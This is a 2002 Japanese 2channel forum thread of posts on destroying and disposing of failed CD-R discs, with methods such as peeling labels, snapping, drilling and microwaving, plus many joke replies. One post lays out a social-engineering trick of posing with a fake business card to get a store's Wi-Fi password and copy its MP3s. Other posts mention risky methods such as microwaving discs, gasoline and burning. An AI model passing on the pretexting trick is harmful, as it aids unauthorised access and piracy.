買い換えて今までのゴミ量産は何だったのだろうかと思ったYO


192 :名無しさん◎書き込み中:02/04/07 03:26 ID:+P7Xvf+n
音楽をCDに焼きたいのです。が、無料で音楽を提供してるとこってありますか?

193 :名無しさん◎書き込み中:02/04/07 05:38 ID:SJ9yEtYW
図書館

194 : :02/04/07 05:47 ID:LHx/9YE4
>>192
タワレコ

195 :名無しさん◎書き込み中:02/04/07 18:15 ID:5SlT4GTe
>>192
裏技を一つ。HMVのカウンター行ってニセの名刺出して、
「雑誌社の者ですが試聴用無線LANのパスワード教えて下さい」と言う。
でそのパスワードで入るのはサーバー何でMP3が置いてある。
それを焼いちゃえ

196 :名無しさん◎書き込み中:02/04/07 18:24 ID:9zil9W72
漏れは普通に燃えるごみの日に捨ててますが
何か問題でもあるの?
後、缶もめんどくさいので、外から見えないようにして
普通に捨ててますが、何か?

197 : :02/04/07 18:36 ID:w2KtaEXp
accsにおくる

198 :名無しさん◎書き込み中:02/04/07 18:59 ID:NddJ3meZ
>>197
ここにいる人みんなが君みたいな人じゃ無いんだよ

199 :名無しさん◎書き込み中:02/04/07 20:49 ID:JYNdleO4
accsってなに?

200 :名無しさん◎書き込み中:02/04/07 21:07 ID:PeMNfi16
>>197
激しくワラタ

201 :名無しさん@お腹いっぱい。:02/04/08 00:48 ID:wIFwogXZ
金槌粉砕作戰、決行セヨ。

202 :名無しさん◎書き込み中:02/04/08 13:36 ID:L1CDFeZX
ONKYOのメディアは良いよ。
レーベル面がぺリッと剥がれてポリカの円盤とアルミ箔に簡単に分離する。
分別回収にもってこいのメディアだね。

203 :名無しさん◎書き込み中:02/04/08 16:12 ID:M3feSI8c
ガムテープよりも100禁の透明なテープがいいYO!

まぁ、それでも面倒ならうちにおくってくれよ。中身は
見ないでちゃんと処分するからさ(藁)

204 :p:02/04/08 16:42 ID:Gug1DUnf
だいそーの百円はさみでまっぷたつ、これ最強。

205 :名無しさん◎書き込み中:02/04/08 18:11 ID:WzJV7Fyg
手近の新聞紙か古雑誌の間に挟んで二つに割ってます。
割った時の破片が飛び散らないし、手を切ったりしないので無難かと。

206 :  :02/04/08 18:15 ID:X6pO0l2n
>>205
同意、自分もタオルかなにか適当なモノに包んで割ります。そのほうが
安心ですし。

207 :名無しさん◎書き込み中:02/04/08 19:24 ID:aKU34SOY
割ったり傷つけたりしたときに出る記録層の金属粉。
これって吸い込んだりしたら有害だよね?

208 :名無しさん◎書き込み中:02/04/08 19:58 ID:tliQHq6N
>>207
金属糞よりも、それについている色素がヤバイ。

ちなみに、手でディスクを追った時に、きれいな切り口で割れる場合、
そのディスクの成形技術は厨房レベル。


209 :名無しさん◎書き込み中:02/04/15 01:18 ID:1ts4htC5
(いまさらだが)
マクセルのCD-Rで>>67の方法をためしたら、ものスゴクきれいにはがれたYO!
すごく、気持ち(・∀・)イイ!!
誘電の場合、レーベルが弱くてうまくはがれない。

ちなみに、マクセルはガムテープでは剥がれません(試した)。
誘電はレーベルもろいから、ガムテープでも剥がれるかも。

210 :名無しさん◎書き込み中:02/04/20 21:04 ID:gw1SL5lo
リサイクルは出来ないのかなあ

211 :名無しさん◎書き込み中:02/04/20 21:12 ID:4n5+EAaI
1です
何気に見てたら見覚えのあるスレ・・・って、立てたこと完全に忘れてた

結局、一番手軽なのは
1、カッターでレーベル面に適当に切りこみ入れる(別に一直線でも曲がっても何でもいい)
2、切れ込みの始まりにセロテープ又はガムテープを貼る
3、端っこからテープを剥がすとレーベル面もいっしょに剥がれる
ですね
自分もこの方法で何十枚か処分しました、ちなみにすべて誘電です
らくちんです

212 :名無しさん◎書き込み中:02/04/21 22:02 ID:ic+c5S6a
俺も電子レンジでチーンだな
数秒で反射材がデロデロに焼けて読み出し不能
一度に何十枚でも処理可能
ただし焼くのは本当に数秒にすること
何分も焼くと萌えるぞ

213 :Fine:02/04/22 03:40 ID:XTMD5Lsd
Xbox(初期)に何度も出し入れし,削らせる。
CD-R-DAなら,再生やリッピングをさせると良く削れる。

但し,この方法では,外周しか削れない。

また,ドリルで穴を明けるも手。その場合は必ず2個以上明けること。
(内周と外周に明けるとよい)

214 :名無しさん◎書き込み中:02/04/22 04:43 ID:T/46MM0o
>>212
萌える?
デロデロCD-Rたん(;´Д`)ハァハァ

215 :名無しさん◎書き込み中:02/04/30 20:26 ID:bS5r6nOm
メーカーは真剣にリサイクルの方法を考案しる!!

216 :名無しさん◎書き込み中:02/04/30 20:39 ID:KpMe5kiu
リサイクル費用を販売価格に転嫁されるという罠。

217 :名無しさん◎書き込み中:02/04/30 20:50 ID:dNYB3SXt
試しに、電子レンジでチンしてみたら間違えて、新品のブランクディスク
の方入れてしまった。。。焦ってすぐ取り出して、まだ使えるかどうか
試そうとして、その時、気が動転しててコンポに入れてしまった。。
そしたら宇多田ヒカルのSAKURAドロップスが流れた。成功!

218 :名無しさん◎書き込み中:02/04/30 20:54 ID:SL7ehPn8
>>217
3点

219 :名無しさん◎書き込み中:02/04/30 21:11 ID:qSuU6hjG
>>217
2.9テソ

220 :名無しさん◎書き込み中:02/04/30 21:20 ID:dX5bDlUk
>>216
それでもちゃんとリサイクルしてるってのが見えるんだったら
払っても良いと思ってみる罠。


221 :名無しさん◎書き込み中:02/05/01 17:16 ID:6+BSIQUs
風の強い日にベランダで風上に立ってスクラッチするのも楽だぞ
五枚が2秒程でクラッシュ出来る
体に悪いかも知れんが・・・

222 :名無しさん◎書き込み中:02/05/01 17:18 ID:gee5NPNd
カッターでキズを付ければいいよ、それか水につけとくとか

223 :         :02/05/01 17:22 ID:OPtmEfKQ
ベランダに紐で吊して鳩と烏よけに使えば?

224 :名無しさん◎書き込み中:02/05/01 22:00 ID:P8u2AU5f
ガイシュツだと思うが、電子レソジでチーソすれば一発だよ。ちょっとプラスチック臭いが。

225 :名無しさん◎書き込み中:02/05/02 01:11 ID:GktyzdI2
レーベル面ってどのくらい剥がせばいいんでしょうか?
一部分でも剥がせば大丈夫ですか?

226 :aho:02/05/02 01:33 ID:/v003Yty
ガソリンかけたらメキメキにひびが入ったよ

227 :名無しさん◎書き込み中:02/05/02 01:44 ID:ywCWtKJC
折るのが一番良いよ、それが一番手間がかからず簡単だしタオルか何かで
包んで折れば破片も飛ばないし怪我もしないでしょ。

228 :名無しさん◎書き込み中:02/05/02 05:58 ID:rqXL29Me


229 :名無しさん◎書き込み中:02/05/02 06:08 ID:rqXL29Me
レンタルしたCDと間違えて返す

230 :_:02/05/03 11:28 ID:/nYnV+K2
美少女フィギュアの土台にする。

231 :名無しさん◎書き込み中:02/05/04 08:31 ID:3FjrERPW
輪投げ

232 :名無しさん◎書き込み中:02/05/04 18:40 ID:jwRAt1rQ
ちんこの

233 :アヒャ:02/05/04 21:27 ID:FnrSGUri
レンジでチン!

234 :名無しさん◎書き込み中:02/05/04 22:27 ID:2sfSWp7E
>>227エンベローブに入れて、真っぷたつに折る!

235 :名無しさん◎書き込み中:02/05/05 00:12 ID:mx/+4WRD
ちんこ音頭する

236 :名無しさん◎書き込み中:02/05/06 06:26 ID:SDg0zAeS


237 :名無しさん◎書き込み中:02/05/10 16:10 ID:IKX9MyOD
エガワカットしてガムテープでびりっ。これ最強。がいしゅつだけどな。

238 :名無しさん◎書き込み中:02/05/10 20:00 ID:gRDPg6LT
>>237
電子レンジが最強に決まってるだろ。

239 :名無しさん◎書き込み中:02/05/10 22:02 ID:Ewo7GL9D
間違えてコーヒーこぼして
2〜3日間忘れる

240 :名無しさん◎書き込み中:02/05/10 23:20 ID:BzHweD95
ダイオキシンの原料として燃やす

241 :名無しさん◎書き込み中:02/05/10 23:47 ID:zOsyPplS
ザーメンぶっかけ

242 :名無しさん◎書き込み中:02/05/11 00:01 ID:A4Y/t6IU
 男 な ら 食 え

243 :名無しさん◎書き込み中:02/05/13 09:38 ID:uwrgR1ka
>>238
電子レンジ高いからやだ

>>242
.________________________________
| 男ならパクリと喰え!  <
|~~~~~~~~~~~~~~~~~~~~~~~~~~
|
ヽ(´A`;)

244 :名無しさん◎書き込み中:02/05/17 05:13 ID:aSYJYVXw
インテリアで、玄関の床に使わなくなったレコードを敷き詰めてる
かっこいいやり方載っていたが、これをCD−Rやいらなくなった
CD−ROMでやったらどうだろう?

それか・・・「かわらけ投げ」

245 :名無しさん◎書き込み中:02/05/17 16:55 ID:wXTq5E9u
切り込み入れて強いゴムで飛ばす

246 :名無しさん◎書き込み中:02/05/17 16:59 ID:roist+qg
色素でジャムを作ってパンに塗って>>1に食わせる

247 :名無しさん◎書き込み中:02/05/17 19:49 ID:u2R5c1Ow
しりをふく

248 :名無しさん◎書き込み中:02/05/17 20:21 ID:zj9WSkco
1000本ノック

249 :名無しさん◎書き込み中:02/05/17 21:46 ID:0l1X1DYW
ソフマップへ売る。

250 :名無しさん◎書き込み中:02/05/17 22:10 ID:3oMBYlJu
太陽誘電あたりがリサイクルやってた様な気がする。


251 :garden:02/05/17 23:16 ID:KhsKztrZ
天日干し!天日干し!データ逝くまで天日干し

252 :名無しさん◎書き込み中:02/05/18 18:46 ID:JYZb2LzP
電子レンジ初体験。
ちょっと焦げちゃった・・・
http://uppp.k1.xrea.com/clip/img/3.jpg

253 :名無しさん◎書き込み中:02/05/18 20:26 ID:7FKSfV0H
>>252
画像で見るとえぐいな

254 :名無しさん◎書き込み中:02/05/18 20:32 ID:hxr4hccX
うわっ、マジでえぐい
しかもプリンコ(w

255 :名無しさん◎書き込み中:02/05/18 20:58 ID:3bvdiCx1
ラベル側をカッターで斜めに切り裂き、コーティングを
反射面ごとぺりぺりとはがしてトランスルーセントディスクにする。

透明なディスクを何枚かならべるとなんか(・∀・)イイ!!

256 :名無しさん◎書き込み中:02/05/18 22:18 ID:65aqIToG
>>252
凄いな・・・

257 :252:02/05/19 00:32 ID:C9bKX7lV
さらに暇だからラベル剥がした。
http://uppp.k1.xrea.com/clip/img/5.jpg

258 :名無しさん◎書き込み中:02/05/19 01:45 ID:XW91lYsX
社外秘のCDはチンで破棄。これ常識。



259 :名無しさん◎書き込み中:02/05/22 00:42 ID:RaaLsPA9
やっぱり不燃ごみにするのは心が痛むよ。で、
>>145 
に送ることにした。でもダンボール1箱になるには相当かかるな。

260 :名無しさん◎書き込み中:02/05/27 11:42 ID:6d1mhjNq
タバコすってて、ゴミメディアを発見したので
ジッポであぶったら、とろけてきて
変な匂いがしたYO!
へにゃへにゃになってたから、読むのは不可能かと思われ

261 :名無しさん◎書き込み中:02/06/27 01:41 ID:2BoViogU
ヤキミスカッター


43 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)